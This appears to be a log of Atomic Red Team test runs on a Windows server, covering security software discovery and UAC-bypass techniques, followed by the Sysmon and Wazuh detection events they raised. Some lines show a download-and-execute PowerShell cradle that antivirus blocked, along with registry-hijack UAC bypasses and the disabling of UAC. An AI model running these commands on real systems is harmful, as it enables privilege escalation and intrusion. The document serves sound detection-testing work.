PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1518.001-1 Security Software Discovery
No Preqs Defined
GetPrereq's for: T1518.001-2 Security Software Discovery - powershell
No Preqs Defined
GetPrereq's for: T1518.001-5 Security Software Discovery - Sysmon Service
No Preqs Defined
GetPrereq's for: T1518.001-6 Security Software Discovery - AV Discovery via WMI
Test run
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1518.001
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1518.001-1 Security Software Discovery
Domain Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096
Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096
Public Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Disable
RemoteManagement                      Disable
UnicastResponseToMulticast            Enable
Logging:
LogAllowedConnections                 Disable
LogDroppedConnections                 Disable
FileName                              %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize                           4096
Ok.
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0         12 K
Registry                        76 Services                   0     41,264 K
smss.exe                       420 Services                   0         40 K
csrss.exe                      568 Services                   0        560 K
csrss.exe                      636 Console                    1        100 K
wininit.exe                    652 Services                   0          8 K
winlogon.exe                   692 Console                    1         12 K
services.exe                   756 Services                   0      3,788 K
lsass.exe                      764 Services                   0      6,988 K
svchost.exe                    868 Services                   0      8,080 K
fontdrvhost.exe                888 Services                   0         16 K
fontdrvhost.exe                896 Console                    1         16 K
svchost.exe                    956 Services                   0      7,800 K
dwm.exe                        524 Console                    1      9,216 K
LogonUI.exe                    572 Console                    1     11,648 K
svchost.exe                    824 Services                   0     82,788 K
svchost.exe                    972 Services                   0     14,228 K
svchost.exe                   1036 Services                   0      5,656 K
svchost.exe                   1152 Services                   0     10,552 K
svchost.exe                   1216 Services                   0      7,636 K
svchost.exe                   1240 Services                   0     26,172 K
svchost.exe                   1380 Services                   0     12,256 K
svchost.exe                   1388 Services                   0        236 K
svchost.exe                   1536 Services                   0      6,272 K
svchost.exe                   1584 Services                   0        916 K
spoolsv.exe                   1952 Services                   0         16 K
amazon-ssm-agent.exe          2036 Services                   0      6,372 K
LiteAgent.exe                 2044 Services                   0        644 K
svchost.exe                   1660 Services                   0      2,848 K
svchost.exe                   1344 Services                   0        640 K
svchost.exe                   2344 Services                   0        916 K
ssm-agent-worker.exe          1116 Services                   0      6,356 K
conhost.exe                   1820 Services                   0        512 K
msdtc.exe                     3308 Services                   0         16 K
svchost.exe                   1064 Services                   0      9,496 K
svchost.exe                    784 Services                   0        992 K
MsMpEng.exe                   3692 Services                   0    118,092 K
NisSrv.exe                    3112 Services                   0      2,344 K
csrss.exe                     2400 RDP-Tcp#0                  2        880 K
winlogon.exe                  1784 RDP-Tcp#0                  2         12 K
fontdrvhost.exe               3736 RDP-Tcp#0                  2        156 K
dwm.exe                       3916 RDP-Tcp#0                  2     43,744 K
rdpclip.exe                   1264 RDP-Tcp#0                  2      3,864 K
sihost.exe                    1612 RDP-Tcp#0                  2     12,244 K
svchost.exe                   1184 RDP-Tcp#0                  2     16,976 K
taskhostw.exe                 3340 RDP-Tcp#0                  2      1,396 K
ctfmon.exe                    2160 RDP-Tcp#0                  2      5,780 K
explorer.exe                  1736 RDP-Tcp#0                  2     31,284 K
StartMenuExperienceHost.e      688 RDP-Tcp#0                  2      5,968 K
TextInputHost.exe             3884 RDP-Tcp#0                  2      8,512 K
RuntimeBroker.exe             2392 RDP-Tcp#0                  2      1,612 K
SearchApp.exe                 4152 RDP-Tcp#0                  2         12 K
RuntimeBroker.exe             4272 RDP-Tcp#0                  2      2,704 K
RuntimeBroker.exe             4396 RDP-Tcp#0                  2      1,860 K
svchost.exe                   5520 RDP-Tcp#0                  2      5,888 K
taskhostw.exe                 6028 RDP-Tcp#0                  2         16 K
dllhost.exe                   1192 RDP-Tcp#0                  2      1,712 K
ShellExperienceHost.exe       6552 RDP-Tcp#0                  2     20,796 K
RuntimeBroker.exe             6716 RDP-Tcp#0                  2      9,632 K
msedge.exe                    2520 RDP-Tcp#0                  2     40,796 K
msedge.exe                    6472 RDP-Tcp#0                  2      1,144 K
msedge.exe                    2760 RDP-Tcp#0                  2     12,752 K
msedge.exe                    4708 RDP-Tcp#0                  2      7,912 K
msedge.exe                    6256 RDP-Tcp#0                  2      1,616 K
msedge.exe                    4072 RDP-Tcp#0                  2     28,064 K
svchost.exe                   4528 RDP-Tcp#0                  2        896 K
msedge.exe                    3132 RDP-Tcp#0                  2      3,208 K
powershell.exe                4640 RDP-Tcp#0                  2     10,640 K
conhost.exe                   6440 RDP-Tcp#0                  2      6,180 K
Sysmon64.exe                  4508 Services                   0     10,272 K
unsecapp.exe                  3756 Services                   0      1,856 K
SecurityHealthService.exe     3000 Services                   0      4,916 K
mmc.exe                       4412 RDP-Tcp#0                  2     22,844 K
wazuh-agent.exe               7004 Services                   0     13,496 K
powershell.exe                5592 RDP-Tcp#0                  2     65,616 K
conhost.exe                   6700 RDP-Tcp#0                  2     21,320 K
WUDFHost.exe                  5352 Services                   0     24,240 K
cmd.exe                       6108 RDP-Tcp#0                  2      4,204 K
conhost.exe                   5320 RDP-Tcp#0                  2     11,000 K
tasklist.exe                  5244 RDP-Tcp#0                  2      8,672 K
WmiPrvSE.exe                  6016 Services                   0      9,068 K
Done executing test: T1518.001-1 Security Software Discovery
Executing test: T1518.001-2 Security Software Discovery - powershell
Done executing test: T1518.001-2 Security Software Discovery - powershell
Executing test: T1518.001-5 Security Software Discovery - Sysmon Service
SysmonDrv                               2       385201         0
Done executing test: T1518.001-5 Security Software Discovery - Sysmon Service
Executing test: T1518.001-6 Security Software Discovery - AV Discovery via WMI
ERROR:
Description = Invalid namespace
Done executing test: T1518.001-6 Security Software Discovery - AV Discovery via WMI
Cleanup
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1518.001 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1518.001-1 Security Software Discovery
Done executing cleanup for test: T1518.001-1 Security Software Discovery
Executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Done executing cleanup for test: T1518.001-2 Security Software Discovery - powershell
Executing cleanup for test: T1518.001-5 Security Software Discovery - Sysmon Service
Done executing cleanup for test: T1518.001-5 Security Software Discovery - Sysmon Service
Executing cleanup for test: T1518.001-6 Security Software Discovery - AV Discovery via WMI
Done executing cleanup for test: T1518.001-6 Security Software Discovery - AV Discovery via WMI
Event log
Rule: 115004 (level 10) -> 'Security Software Discovery Attempt has been Detected on EC2AMAZ-3188I1R'
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T16:34:54.8695266Z","eventRecordID":"9801","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Process Create:\r\nRuleName: technique_id=T1518.001,technique_name=Security Software Discovery\r\nUtcTime: 2022-07-18 16:34:54.862\r\nProcessGuid: {a64f3178-8bae-62d5-fd06-000000009000}\r\nProcessId: 104\r\nImage: C:\\Windows\\System32\\fltMC.exe\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Filter Manager Control Program\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: fltMC.exe\r\nCommandLine: fltmc.exe  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\\r\nUser: EC2AMAZ-3188I1R\\Administrator\r\nLogonGuid: {a64f3178-1b8a-62d5-e934-1b0000000000}\r\nLogonId: 0x1B34E9\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: SHA1=389A68B031CBC0A9E1C71D69CADC5C7579AE620A,MD5=920F1BBF89DF2B8A5F4C10FA400E5A67,SHA256=5C7C65475F4F85B5684B63AE4384BE9A3B948A0FE77A24B345E1F4291BC90964,IMPHASH=3BB9381340F6C7B1E51AD45AB82E32D2\r\nParentProcessGuid: {a64f3178-8bae-62d5-fb06-000000009000}\r\nParentProcessId: 4204\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"cmd.exe\" /c \"fltmc.exe | findstr.exe 385201\"\r\nParentUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1518.001,technique_name=Security Software Discovery","utcTime":"2022-07-18 16:34:54.862","processGuid":"{a64f3178-8bae-62d5-fd06-000000009000}","processId":"104","image":"C:\\\\Windows\\\\System32\\\\fltMC.exe","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Filter Manager Control Program","product":"Microsoft® Windows® 
Operating System","company":"Microsoft Corporation","originalFileName":"fltMC.exe","commandLine":"fltmc.exe","currentDirectory":"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\2\\\\","user":"EC2AMAZ-3188I1R\\\\Administrator","logonGuid":"{a64f3178-1b8a-62d5-e934-1b0000000000}","logonId":"0x1b34e9","terminalSessionId":"2","integrityLevel":"High","hashes":"SHA1=389A68B031CBC0A9E1C71D69CADC5C7579AE620A,MD5=920F1BBF89DF2B8A5F4C10FA400E5A67,SHA256=5C7C65475F4F85B5684B63AE4384BE9A3B948A0FE77A24B345E1F4291BC90964,IMPHASH=3BB9381340F6C7B1E51AD45AB82E32D2","parentProcessGuid":"{a64f3178-8bae-62d5-fb06-000000009000}","parentProcessId":"4204","parentImage":"C:\\\\Windows\\\\System32\\\\cmd.exe","parentCommandLine":"\\\"cmd.exe\\\" /c \\\"fltmc.exe | findstr.exe 385201\\\"","parentUser":"EC2AMAZ-3188I1R\\\\Administrator"}}}
Dashboard event entry

1518

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control 🟢

GetPrereqs
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
No Preqs Defined
GetPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
No Preqs Defined
GetPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
No Preqs Defined
GetPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
No Preqs Defined
GetPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
No Preqs Defined
GetPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
No Preqs Defined
GetPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
No Preqs Defined
GetPrereq's for: T1548.002-8 Disable UAC using reg.exe
No Preqs Defined
GetPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
No Preqs Defined
GetPrereq's for: T1548.002-10 UACME Bypass Method 23
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)
Prereq successfully met: UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)
GetPrereq's for: T1548.002-11 UACME Bypass Method 31
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)
GetPrereq's for: T1548.002-12 UACME Bypass Method 33
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)
GetPrereq's for: T1548.002-13 UACME Bypass Method 34
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)
GetPrereq's for: T1548.002-14 UACME Bypass Method 39
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)
GetPrereq's for: T1548.002-15 UACME Bypass Method 56
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)
GetPrereq's for: T1548.002-16 UACME Bypass Method 59
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)
GetPrereq's for: T1548.002-17 UACME Bypass Method 61
Attempting to satisfy prereq: UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)
Prereq already met: UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)
GetPrereq's for: T1548.002-18 WinPwn - UAC Magic
No Preqs Defined
GetPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
No Preqs Defined
GetPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
No Preqs Defined
GetPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
No Preqs Defined
Test run
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
The operation completed successfully.
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.
C:\Users\ADMINI~1\AppData\Local\Temp\2>
Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open

Name                           Property
----                           --------
command

Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing test: T1548.002-3 Bypass UAC using Fodhelper
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:46 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception

Done executing test: T1548.002-3 Bypass UAC using Fodhelper
Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name                           Property
----                           --------
command

DelegateExecute :
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)

    Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open

Name                           Property
----                           --------
command

DelegateExecute :
                                                                                     PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command                                                                                                                PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                                                                                        PSChildName     : command                                                                                                                                                                                                              PSDrive         : HKCU                                                                                                                                                                                                                 PSProvider      : Microsoft.PowerShell.Core\Registry                                                                                                                                                                                   Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                                                                                                                                        Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                                                                                                                                  1 file(s) copied.                                                                                                                                                                                                                      
symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe                                                                                                                                                   Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                                                                                                                             Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                                                                                                                                     Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open                                                                                                                                                                             Name                           Property                                                                                                                                                                                                ----                           --------                                                                                                                                                                                                command                        (default) : cmd.exe /c notepad.exe                                                                                                                                                                      DelegateExecute :                                                                                                                                                                                                                      PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command                                      
                                                                               PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open                                                                                                                             PSChildName     : command                                                                                                                                                                                                              PSDrive         : HKCU                                                                                                                                                                                                                 PSProvider      : Microsoft.PowerShell.Core\Registry                                                                                                                                                                                   Start-Process : This command cannot be run due to the error: The system cannot find the file specified.
At line:3 char:1
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing test: T1548.002-8 Disable UAC using reg.exe
Executing test: T1548.002-9 Bypass UAC using SilentCleanup task
The screen cannot be set to the number of lines and columns specified.
The operation completed successfully.
ERROR: Input redirection is not supported, exiting the process immediately.
Access is denied.
ERROR: Input redirection is not supported, exiting the process immediately.
Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing test: T1548.002-10 UACME Bypass Method 23
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\23 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-10 UACME Bypass Method 23
Executing test: T1548.002-11 UACME Bypass Method 31
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\31 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\33 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\34 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-13 UACME Bypass Method 34
Executing test: T1548.002-14 UACME Bypass Method 39
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\39 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-14 UACME Bypass Method 39
Executing test: T1548.002-15 UACME Bypass Method 56
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\56 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-15 UACME Bypass Method 56
Executing test: T1548.002-16 UACME Bypass Method 59
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\59 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-16 UACME Bypass Method 59
Executing test: T1548.002-17 UACME Bypass Method 61
'"C:\Users\ADMINI~1\AppData\Local\Temp\2\uacme\61 Akagi64.exe"' is not recognized as an internal or external command,
operable program or batch file.
Done executing test: T1548.002-17 UACME Bypass Method 61
Executing test: T1548.002-18 WinPwn - UAC Magic
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Done executing test: T1548.002-18 WinPwn - UAC Magic
Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
iex : At line:1 char:1
+ #  Global TLS Setting for all functions. If TLS12 isn't suppported yo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:2 char:1
+ iex(new-object net.webclient).downloadstring('https://raw.githubuserc ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand

UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:3 char:1
+ UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ...
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
iex : At line:1 char:1
+ function dccuacbypass
+ ~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:4
+ & {iex(new-object net.webclient).downloadstring('https://raw.githubus ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Cleanup
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Event log
RuleName: technique_id=T1548.002,technique_name=Bypass User Access Control
win.eventdata.ruleName: technique_id=T1548.002,technique_name=Bypass User Access Control
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"13","version":"2","level":"4","task":"13","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T15:49:05.1776583Z","eventRecordID":"7714","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Registry value set:\r\nRuleName: technique_id=T1548.002,technique_name=Bypass User Access Control\r\nEventType: SetValue\r\nUtcTime: 2022-07-18 15:49:05.173\r\nProcessGuid: {a64f3178-80f1-62d5-0606-000000009000}\r\nProcessId: 4724\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA\r\nDetails: DWORD (0x00000001)\r\nUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1548.002,technique_name=Bypass User Access Control","eventType":"SetValue","utcTime":"2022-07-18 15:49:05.173","processGuid":"{a64f3178-80f1-62d5-0606-000000009000}","processId":"4724","image":"C:\\\\Windows\\\\system32\\\\reg.exe","targetObject":"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA","details":"DWORD (0x00000001)","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}
RuleName: technique_id=T1548.002,technique_name=Bypass User Access Control
